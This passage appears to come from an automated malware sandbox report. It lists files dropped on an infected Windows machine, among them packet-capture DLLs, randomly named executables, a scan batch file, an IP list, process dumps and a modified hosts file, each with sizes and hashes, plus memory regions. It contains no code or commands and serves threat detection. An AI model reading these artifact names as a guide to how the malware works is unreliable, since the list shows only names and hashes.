                                                                                                                                                          • C:\Windows\SysWOW64\Packet.dll
                                                                                                                                                            Filesize

                                                                                                                                                            95KB

                                                                                                                                                            MD5

                                                                                                                                                            86316be34481c1ed5b792169312673fd

                                                                                                                                                            SHA1

                                                                                                                                                            6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                                                                                                            SHA256

                                                                                                                                                            49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                                                                                                            SHA512

                                                                                                                                                            3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                                                                                                          • C:\Windows\SysWOW64\wpcap.dll
                                                                                                                                                            Filesize

                                                                                                                                                            275KB

                                                                                                                                                            MD5

                                                                                                                                                            4633b298d57014627831ccac89a2c50b

                                                                                                                                                            SHA1

                                                                                                                                                            e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                                                                                                            SHA256

                                                                                                                                                            b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                                                                                                            SHA512

                                                                                                                                                            29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                                                                                                          • C:\Windows\TEMP\abyrlhezn\config.json
                                                                                                                                                            Filesize

                                                                                                                                                            693B

                                                                                                                                                            MD5

                                                                                                                                                            f2d396833af4aea7b9afde89593ca56e

                                                                                                                                                            SHA1

                                                                                                                                                            08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                                                                                                            SHA256

                                                                                                                                                            d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                                                                                                            SHA512

                                                                                                                                                            2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                                                                                                                          • C:\Windows\TEMP\ybbsclezq\1040.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4.6MB

                                                                                                                                                            MD5

                                                                                                                                                            21cb549e1f9bcf319cea1bada8f28549

                                                                                                                                                            SHA1

                                                                                                                                                            eaefd622dd90ebff32d4730b3129868b9251132f

                                                                                                                                                            SHA256

                                                                                                                                                            c402cf81e20723e88071de187f575b7eabe5e2722f6b6a6811d5b761557beff4

                                                                                                                                                            SHA512

                                                                                                                                                            752ca907399ba7c3498c0bdf683d94109dcaa5a3cd563c8924426d7aa1c75a497509cdfbdbe98caded639dc59f522547744832ea2d761641aca4f89c1a235897

                                                                                                                                                          • C:\Windows\TEMP\ybbsclezq\1056.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.4MB

                                                                                                                                                            MD5

                                                                                                                                                            2d90a7e61ad73b17df4b3d058ee2a4c3

                                                                                                                                                            SHA1

                                                                                                                                                            0579bde478f1fd41c9657173e34764e5941d261c

                                                                                                                                                            SHA256

                                                                                                                                                            900e38ba4f39030564e74b034ca7a35bd242aaedb5a70ff54e516cd54790fa16

                                                                                                                                                            SHA512

                                                                                                                                                            e9f0b1ac3671a55b1981d5c9d83b6a0c6cfec596058fbcd9b1a4d082826755e4e0f84e1d23e11b08fde22121def5d3f99407fa30093e533bfa9706e7986cea60

                                                                                                                                                          • C:\Windows\TEMP\ybbsclezq\1132.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.3MB

                                                                                                                                                            MD5

                                                                                                                                                            ea34357bd1297d43602f33c6f9b94a39

                                                                                                                                                            SHA1

                                                                                                                                                            b141874813b480a62cc8370999481948d2bf7ed4

                                                                                                                                                            SHA256

                                                                                                                                                            4a37c77fdd3ea3a3ffead411cd3972467fe9d152b0cbb7b28a62c879e2ced1fb

                                                                                                                                                            SHA512

                                                                                                                                                            33ce7dcf917947695ddbdb9a7dd27d0b0ec0f9567ccdf79f3bd09b0faac251dad6d17ab3f22e645693ed21b168c8fdc1531b553893f0deb91b0ec79c7218d355

                                                                                                                                                          • C:\Windows\TEMP\ybbsclezq\1360.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            851KB

                                                                                                                                                            MD5

                                                                                                                                                            0221c345c234e933393500d881f748fa

                                                                                                                                                            SHA1

                                                                                                                                                            33bdda17aebee739bd331717e43b63148af14c09

                                                                                                                                                            SHA256

                                                                                                                                                            ef9d361daab92d0ffc68b713a89fee29d3735e1a68d58e4b7a9c635e78265f11

                                                                                                                                                            SHA512

                                                                                                                                                            16259b16f94b0ebe3944134d2d6cd70dda2af66a84b422f6770cf36f77893c6653870b51f07131bc5e734566603520b3151d39e6ec7fd359a6f0ba1cdd12c0ef

                                                                                                                                                          • C:\Windows\TEMP\ybbsclezq\3000.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            7.1MB

                                                                                                                                                            MD5

                                                                                                                                                            6fa313b0faaad1fa5f4af23dbcf38428

                                                                                                                                                            SHA1

                                                                                                                                                            101145f8f33577da09e4c51fc22883d0b3a94739

                                                                                                                                                            SHA256

                                                                                                                                                            619ac596245ce7cd42d0e87d2d169658757aeb6aa938fa8f6fd182854085fba4

                                                                                                                                                            SHA512

                                                                                                                                                            654a98287e798b87633d638a0d337e80459739407347c17e196a0690bbc3a87c5a7c988f98df08c5433d9d4a4204894a33367ceb6e2fb9b23c1a5a9b185e3b17

                                                                                                                                                          • C:\Windows\Temp\abyrlhezn\yzhesb.exe
                                                                                                                                                            Filesize

                                                                                                                                                            343KB

                                                                                                                                                            MD5

                                                                                                                                                            2b4ac7b362261cb3f6f9583751708064

                                                                                                                                                            SHA1

                                                                                                                                                            b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                                                                                                            SHA256

                                                                                                                                                            a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                                                                                                            SHA512

                                                                                                                                                            c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                                                                                                                          • C:\Windows\Temp\xohudmc.exe
                                                                                                                                                            Filesize

                                                                                                                                                            72KB

                                                                                                                                                            MD5

                                                                                                                                                            cbefa7108d0cf4186cdf3a82d6db80cd

                                                                                                                                                            SHA1

                                                                                                                                                            73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                                                                                                            SHA256

                                                                                                                                                            7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                                                                                                            SHA512

                                                                                                                                                            b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                                                                                                                          • C:\Windows\system32\drivers\etc\hosts
                                                                                                                                                            Filesize

                                                                                                                                                            975B

                                                                                                                                                            MD5

                                                                                                                                                            b5d815ff5310f62de5020591be598bc0

                                                                                                                                                            SHA1

                                                                                                                                                            8013562b0cc2516d16d474308c8982a31b7f5dd0

                                                                                                                                                            SHA256

                                                                                                                                                            a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

                                                                                                                                                            SHA512

                                                                                                                                                            4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

                                                                                                                                                          • C:\Windows\ybbsclezq\Corporate\vfshost.exe
                                                                                                                                                            Filesize

                                                                                                                                                            381KB

                                                                                                                                                            MD5

                                                                                                                                                            fd5efccde59e94eec8bb2735aa577b2b

                                                                                                                                                            SHA1

                                                                                                                                                            51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                                                                                                            SHA256

                                                                                                                                                            441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                                                                                                            SHA512

                                                                                                                                                            74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                                                                                                          • C:\Windows\ybbsclezq\sdgebhger\ip.txt
                                                                                                                                                            Filesize

                                                                                                                                                            191B

                                                                                                                                                            MD5

                                                                                                                                                            d24d9ba88e8e28c4b3448f2fbcff6575

                                                                                                                                                            SHA1

                                                                                                                                                            d058a62902e7a5423344283b8880f0674bdd2739

                                                                                                                                                            SHA256

                                                                                                                                                            a263153e0bd53bfa626d74eec90e1a9614b7555ebba8855a2e5c27ae4f53d137

                                                                                                                                                            SHA512

                                                                                                                                                            c263f2085208a44b826b75ad2068db879e778c52c0e44512eb0e3bde6c51372f38642c4a2f880e323225f492c7e261925d788f767e73f8266b33a72d94dc4f55

                                                                                                                                                          • C:\Windows\ybbsclezq\sdgebhger\scan.bat
                                                                                                                                                            Filesize

                                                                                                                                                            159B

                                                                                                                                                            MD5

                                                                                                                                                            c33d8fbaf4805d6794f6aa3d4ea0ac87

                                                                                                                                                            SHA1

                                                                                                                                                            147de1dc1e56ba835c099eac084037888530926c

                                                                                                                                                            SHA256

                                                                                                                                                            4923b28485a40b0e2f7e37991855d329b61b4ad9742d08b2fdd301f693ec87b5

                                                                                                                                                            SHA512

                                                                                                                                                            85722059e7a1d1a7cce7d3a74c908ad2461c494c001b201728420b716faf4a80aad48e386e49f8e52446fed66d951de5b2680deb8a81965ceece88a4104de5e2

                                                                                                                                                          • C:\Windows\ybbsclezq\sdgebhger\wpcap.exe
                                                                                                                                                            Filesize

                                                                                                                                                            424KB

                                                                                                                                                            MD5

                                                                                                                                                            e9c001647c67e12666f27f9984778ad6

                                                                                                                                                            SHA1

                                                                                                                                                            51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                                                                                                            SHA256

                                                                                                                                                            7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                                                                                                            SHA512

                                                                                                                                                            56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                                                                                                          • C:\Windows\ybbsclezq\sdgebhger\zkyetylab.exe
                                                                                                                                                            Filesize

                                                                                                                                                            332KB

                                                                                                                                                            MD5

                                                                                                                                                            ea774c81fe7b5d9708caa278cf3f3c68

                                                                                                                                                            SHA1

                                                                                                                                                            fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                                                                                                            SHA256

                                                                                                                                                            4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                                                                                                            SHA512

                                                                                                                                                            7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                                                                                                          • \Windows\Temp\nst891F.tmp\System.dll
                                                                                                                                                            Filesize

                                                                                                                                                            11KB

                                                                                                                                                            MD5

                                                                                                                                                            2ae993a2ffec0c137eb51c8832691bcb

                                                                                                                                                            SHA1

                                                                                                                                                            98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                                                                                                            SHA256

                                                                                                                                                            681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                                                                                                            SHA512

                                                                                                                                                            2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                                                                                                          • \Windows\Temp\nst891F.tmp\nsExec.dll
                                                                                                                                                            Filesize

                                                                                                                                                            6KB

                                                                                                                                                            MD5

                                                                                                                                                            b648c78981c02c434d6a04d4422a6198

                                                                                                                                                            SHA1

                                                                                                                                                            74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                                                                                                            SHA256

                                                                                                                                                            3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                                                                                                            SHA512

                                                                                                                                                            219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                                                                                                          • \Windows\Temp\ybbsclezq\rdglllqba.exe
                                                                                                                                                            Filesize

                                                                                                                                                            126KB

                                                                                                                                                            MD5

                                                                                                                                                            e8d45731654929413d79b3818d6a5011

                                                                                                                                                            SHA1

                                                                                                                                                            23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                                                                                                            SHA256

                                                                                                                                                            a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                                                                                                            SHA512

                                                                                                                                                            df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                                                                                                          • \Windows\tkeblhan\hbuauda.exe
                                                                                                                                                            Filesize

                                                                                                                                                            7.2MB

                                                                                                                                                            MD5

                                                                                                                                                            4366b6b823970d628cd8e79c4adaa52b

                                                                                                                                                            SHA1

                                                                                                                                                            1ee641c1c2d5abfa9b530e8ac86a5388d4d6c974

                                                                                                                                                            SHA256

                                                                                                                                                            4f0c2734109b80ccc728e39f8e497f08a7b384118109e633f749d4b19d800779

                                                                                                                                                            SHA512

                                                                                                                                                            5ad356f098e0745e70e2d2d1520f6577192793210a6d0ea7aa3c3bae1dff775922d090b976fe5059c46fd548c706cba654f94d0a6cb1b4b4600708a96ff9cded

                                                                                                                                                          • \Windows\ybbsclezq\sdgebhger\yrbrnhula.exe
                                                                                                                                                            Filesize

                                                                                                                                                            63KB

                                                                                                                                                            MD5

                                                                                                                                                            821ea58e3e9b6539ff0affd40e59f962

                                                                                                                                                            SHA1

                                                                                                                                                            635a301d847f3a2e85f21f7ee12add7692873569

                                                                                                                                                            SHA256

                                                                                                                                                            a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

                                                                                                                                                            SHA512

                                                                                                                                                            0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

                                                                                                                                                          • memory/348-142-0x000000013F3B0000-0x000000013F40B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            364KB

                                                                                                                                                          • memory/348-163-0x000000013F3B0000-0x000000013F40B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            364KB

                                                                                                                                                          • memory/568-74-0x0000000000310000-0x000000000035C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            304KB

                                                                                                                                                          • memory/836-147-0x000000013F3B0000-0x000000013F4D0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.1MB

                                                                                                                                                          • memory/836-162-0x0000000000220000-0x0000000000224000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            16KB

                                                                                                                                                          • memory/836-159-0x0000000000210000-0x0000000000220000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/1276-182-0x000000013F1A0000-0x000000013F1FB000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            364KB

                                                                                                                                                          • memory/1460-132-0x0000000001050000-0x000000000113E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            952KB

                                                                                                                                                          • memory/1460-134-0x0000000001050000-0x000000000113E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            952KB

                                                                                                                                                          • memory/1520-188-0x000000013F100000-0x000000013F15B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            364KB

                                                                                                                                                          • memory/1644-0-0x0000000000400000-0x0000000000A9B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            6.6MB

                                                                                                                                                          • memory/1692-176-0x000000013F220000-0x000000013F27B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            364KB

                                                                                                                                                          • memory/1924-194-0x000000013F2A0000-0x000000013F2FB000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            364KB

                                                                                                                                                          • memory/2496-8-0x0000000000400000-0x0000000000A9B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            6.6MB

                                                                                                                                                          • memory/2636-146-0x0000000002F60000-0x0000000003080000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.1MB

                                                                                                                                                          • memory/2636-141-0x0000000002590000-0x00000000025EB000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            364KB

                                                                                                                                                          • memory/2852-136-0x000000013F1E0000-0x000000013F2CE000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            952KB

                                                                                                                                                          • memory/2852-135-0x000000013F1E0000-0x000000013F2CE000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            952KB

                                                                                                                                                          • memory/2912-158-0x0000000010000000-0x0000000010008000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            32KB